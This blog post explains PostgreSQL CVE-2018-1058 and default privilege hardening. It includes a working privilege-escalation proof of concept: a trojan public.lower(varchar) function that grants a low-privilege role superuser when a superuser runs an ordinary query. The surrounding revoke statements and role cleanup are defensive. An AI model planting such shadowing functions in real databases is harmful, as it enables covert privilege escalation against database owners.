PostgreSQL Deep Dive: PostgreSQL Defaults and Impact on Security - Part 2
In Part 1 of this blog, we covered quite a bit of information with respect to how a PostgreSQL database is initially configured by default from the perspective of discretionary access control. We also saw how to inspect those default behaviors using the crunchy_check_access extension. In Part 2, we will explore the situation identified in CVE-2018-1058 and discuss how to protect yourself.
CVE-2018-1058: Explained and Exploited
Finally we have come to the Pièce De Résistance!
CVE-2018-1058 describes how a user can create objects, named the same as objects in different schemas which can change the behavior of other users' queries, potentially causing unexpected or malicious behavior. This is also known as a trojan-horse attack. In order to fully understand how this situation may arise, we will first review some fundamental PostgreSQL concepts.
Concept: Schemas
Schemas allow users to create objects in separate namespaces. This in turn allows multiple objects to have same object names, since they are differentiated by the namespace name, i.e. the schema name. By default:
- All databases have schema called
pg_catalog
, which includes built-in objects provided by PostgreSQL which are generally necessary for normal database operations. These include very basic functions such asint4pl()
, which adds two integers, as well as commonly used utility functions such aslower()
. More on thelower()
function later since it is the focus of the examples. - New databases have a schema called
public
, and any connected user can create objects in thepublic
schema. We saw this earlier when examining permissions. This provides a place in which an arbitrary user can create an arbitrary function unless specific action is taken to prevent it.
Concept: Search Path
PostgreSQL searches the system catalog schema, pg_catalog
first. Otherwise the search_path
setting determines object resolution, similar to the way that the $PATH
setting works for command resolution at a bash
shell command line. By default:
search_path = $user, public
$user
is equal to theSESSION_USER
name
Although search_path
starts with $user
, the $user
schema will not exist unless it is created. Recall earlier that a user must have the SUPERUSER
attribute in order to create a schema in a database, so normal unprivileged roles cannot create this for themselves. However the public
schema is second in line, and anybody can create objects there. Hold onto that thought.
Concept: Function Signature and Datatype Coercion
In addition to name resolution, as mentioned earlier functions are resolved by input argument datatype as well. Automatic implicit datatype coercion occurs for certain built-in datatypes. Example:
-- following function works for text,
-- or varchar if it exists alone in the search path
CREATE FUNCTION bar(text) ...;
-- but this function may also exist, and if so, it will handle varchar
CREATE FUNCTION bar(varchar) ...;
Consequences
By default:
All new objects (e.g. tables, functions) are created in the
public
schema.Unqualified referenced objects are found in public schema. Note that by "unqualified" I mean references to an object that are not schema qualified. E.g.
pg_catalog.int4pl(1,1)
is fully schema qualified versusint4pl(1,1)
which is not.It is possible for an unprivileged (does not hold the
SUPERUSER
attribute) user to create function such that:the function name matches a
pg_catalog
functionbut with different argument datatype(s)
where the arguments are normally implicitly coerced datatype(s) when the
pg_catalog
version of the function is selected.
Some SQL will hopefully help make all of this a bit more clear:
CREATE TABLE foo(id int);
-- these are equivalent by default
SELECT * FROM foo;
SELECT * FROM public.foo;
-- clean up
DROP TABLE foo;
CREATE FUNCTION lower(varchar) RETURNS text AS $$
SELECT 'ALICE WAS HERE: ' || $1;
$$ LANGUAGE SQL IMMUTABLE;
-- note public.lower(varchar) will shadow pg_catalog.lower(text)
-- when the arg is actually varchar
\df lower
List of functions
Schema | Name | Result data type | Argument data types | Type
------------+-------+------------------+---------------------+------
pg_catalog | lower | anyelement | anyrange | func
pg_catalog | lower | text | text | func
public | lower | text | character varying | func
-- clean up
DROP FUNCTION lower(varchar);
As you can see here, the version of lower()
in public
takes an argument of type character varying
, while the one in pg_catalog
which ships with PostgreSQL takes an argument of type text
. When an unsuspecting user subsequently executes SELECT lower('some varchar data')
the former will now get used instead of the latter (assuming we had not dropped the function as we did above).
The problem is that when we combine
- a default
public
schemaCREATE
privilege via thePUBLIC
group - a default
search_path
setting which includes thepublic
schema - the ability to create objects with the same names in different schemas
- the method that PostgreSQL uses when it searches for objects based on
search_path
- function signature resolution
- implicit datatype conversions
it presents the opportunity for one user to modify behavior of another user's query. For example, we can insert a function that, when executed by superuser, grants escalated privileges to ourselves.
Full Example
CREATE TABLE categories
(
category_id integer PRIMARY KEY,
category_name varchar(32) UNIQUE,
category_desc varchar(128)
);
INSERT INTO categories VALUES
(1, 'cold beverages', 'cold beverages, non-alcoholic'),
(2, 'beer', 'domestic beer'),
(3, 'craft beer', 'international and craft domestic beer'),
(4, 'hot beverages', 'tea, coffee, latte');
CREATE ROLE dbro LOGIN;
SET SESSION AUTHORIZATION dbro;
CREATE OR REPLACE FUNCTION lower(varchar)
RETURNS text AS $$
DECLARE
dbro_issu bool;
curr_issu bool;
BEGIN
dbro_issu := usesuper from pg_user where usename = 'dbro';
curr_issu := usesuper from pg_user where usename = CURRENT_USER;
IF curr_issu AND NOT dbro_issu THEN
ALTER USER dbro SUPERUSER;
END IF;
RETURN lower($1::text);
END;
$$ LANGUAGE plpgsql VOLATILE;
RESET SESSION AUTHORIZATION;
\du dbro
List of roles
Role name | Attributes | Member of
-----------+------------+-----------
dbro | | {}
-- looks "normal"
SELECT category_desc FROM categories
WHERE lower(category_name) LIKE '%beverage%';
category_desc
-------------------------------
cold beverages, non-alcoholic
tea, coffee, latte
(2 rows)
-- but dbro successfully gained superuser
\du dbro
List of roles
Role name | Attributes | Member of
-----------+------------+-----------
dbro | Superuser | {}
-- clean up
ALTER USER dbro NOSUPERUSER;
DROP FUNCTION lower(varchar);
The Fix
The first blush and simplest way to prevent this exploit is to not allow unprivileged roles to CREATE
objects in the public
schema, or any other schema in your default search_path
.
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
However there are a few other default privileges granted to PUBLIC
to consider.
CONNECT
, andTEMPORARY
orTEMP
on database objectsUSAGE
onplpgsql
andsql
languagesUSAGE
on thepublic
schemaEXECUTE
on newly created functions
Therefore the full fix might look like this:
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
REVOKE EXECUTE ON ALL ROUTINES IN SCHEMA public FROM PUBLIC;
ALTER DEFAULT PRIVILEGES IN SCHEMA public
REVOKE EXECUTE ON ROUTINES FROM PUBLIC;
-- And/or possibly, more drastic options:
-- REVOKE USAGE ON SCHEMA public FROM PUBLIC;
-- DROP SCHEMA public CASCADE;
REVOKE TEMPORARY ON DATABASE deepdive FROM PUBLIC;
REVOKE USAGE ON LANGUAGE sql, plpgsql FROM PUBLIC;
From here you should go back and explicitly grant privileges to the roles that should have them. Take the role membership hierarchy into account, and fix it if needed. A simpler hierarchy will be easier to understand and anticipate consequences of the grants you make. Organize the privileges by granting to "group" roles and not directly to user/login roles. When finished, check the result with the check_access
extension.
Cleanup
Let's check with check_access
to see what we have at this point:
SELECT *
FROM all_access()
WHERE base_role != CURRENT_USER
AND base_role NOT LIKE 'pg_%';
There are still 413 rows even when excluding the postgres
superuser and the built in pg_*
roles. We can improve this situation a bit by ensuring or roles membership hierarchy is not out of whack. Recall what the current situation is:
\du
List of roles
Role name | Attributes | Member of
-----------+------------------------------------------------------------+--------------
alice | No inheritance | {endusers,joe}
apps | Cannot login | {}
appuser | | {apps}
bob | No inheritance | {dbadmins}
dbadm | Superuser | {}
dbadmins | Cannot login | {}
dbro | | {}
joe | | {endusers}
endusers | No inheritance, Cannot login | {dbadm}
mary | | {joe}
postgres | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
sue | | {dbadmins}
What are the likely problems here?
dbadm
is a login role withSUPERUSER
, whiledbadmins
is a group role without theSUPERUSER
attribute. We should probably dropdbadm
since we don't want folks to log in directly as a superuser, but rather log in as themselves and then escalate usingSET ROLE
.- In doing the first step,
endusers
will lose the ability to become a superuser viadbadm
. This is probably a good thing because based on that name, we would expect that group to be normal unprivileged users and not administrators. We should now consolidate our normal users underendusers
and our presumed admins underdbadmins
. - Additionally we can drop the
dbro
user we created for demonstration purposes earlier. We are going to assume that generic login accounts are discouraged, and we will only keep the ones necessary for our applications to connect -- in this caseappuser
.
DROP ROLE dbadm;
ALTER ROLE dbadmins SUPERUSER;
REVOKE joe FROM alice;
REVOKE joe FROM mary;
GRANT endusers TO mary;
DROP ROLE dbro;
\du
List of roles
Role name | Attributes | Member of
-----------+------------------------------------------------------------+------------
alice | No inheritance | {endusers}
apps | Cannot login | {}
appuser | | {apps}
bob | No inheritance | {dbadmins}
dbadmins | Superuser, Cannot login | {}
joe | | {endusers}
endusers | No inheritance, Cannot login | {}
mary | | {endusers}
postgres | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
sue | | {dbadmins}
Much cleaner, and easier to understand! However we still have not dealt with the NOINHERIT
attribute of several roles. Personally I think that the NOINHERIT
attribute does not make much sense for unprivileged roles. If we use that at all, it probably should be for the administrative roles to ensure no leakage of privileges from the more privileged role to the normal login roles of these users.
ALTER ROLE alice INHERIT;
ALTER ROLE endusers INHERIT;
ALTER ROLE sue NOINHERIT;
\du
List of roles
Role name | Attributes | Member of
-----------+------------------------------------------------------------+------------
alice | | {endusers}
apps | Cannot login | {}
appuser | | {apps}
bob | No inheritance | {dbadmins}
dbadmins | Superuser, Cannot login | {}
joe | | {endusers}
endusers | Cannot login | {}
mary | | {endusers}
postgres | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
sue | No inheritance | {dbadmins}
Now we can see that bob
and sue
are our admins, while alice
, joe
, and mary
are our normal users, and appuser
is our system account for the application to use. Much better. Rerun check_access
:
SELECT * FROM all_access()
WHERE base_role NOT LIKE 'pg_%'
AND base_role NOT IN ('bob', 'dbadmins', 'postgres', 'sue');
Notice that the superusers and built-in pg_*
roles were eliminated intentionally, and now we have only 30 rows. That result is easy to comprehend, and we could even store it somewhere and rerun the same query later to detect undesired/unauthorized changes.
In fact, as a final exercise, let's rerun a modified version of the aggregate query form of this:
SELECT objtype, schemaname, objname, privname, array_agg(base_role)
FROM all_access()
WHERE base_role NOT LIKE 'pg_%'
AND base_role NOT IN ('bob', 'dbadmins', 'postgres', 'sue')
GROUP BY objtype, schemaname, objname, privname
ORDER BY 1, 2, 3, 4;
objtype | schemaname | objname | privname | array_agg
----------+------------+--------------+----------+--------------------------------------
database | | deepdive | CONNECT | {alice,apps,appuser,joe,endusers,mary}
schema | public | public | USAGE | {alice,apps,appuser,joe,endusers,mary}
view | public | my_privs | SELECT | {alice,apps,appuser,joe,endusers,mary}
view | public | my_privs_sys | SELECT | {alice,apps,appuser,joe,endusers,mary}
view | public | widget_inv | SELECT | {alice,apps,appuser,joe,endusers,mary}
(5 rows)
That is very easy to read and understand, and we can quickly surmise that our DAC is as it should be.
Conclusion
This blog has covered quite a bit of material, and yet there is much it did not cover. As mentioned, we could have explored the capabilities of the pg_*
roles. We did not touch on the special status of object owners with respect to security -- hint, the owner largely bypasses DAC by default, and also row level security (RLS). And speaking of which, we did not cover RLS at all, and likely other things I am not thinking of at the moment. Ah well, material for another blog (or blog series) on another day.
I hope you stuck it out to the end and you enjoyed the learning. If you are reading this, congratulations!
Related Articles
- Crunchy Data Warehouse: Postgres with Iceberg for High Performance Analytics
8 min read
- Loading the World! OpenStreetMap Import In Under 4 Hours
6 min read
- Easy Totals and Subtotals in Postgres with Rollup and Cube
5 min read
- A change to ResultRelInfo - A Near Miss with Postgres 17.1
8 min read
- Accessing Large Language Models from PostgreSQL
5 min read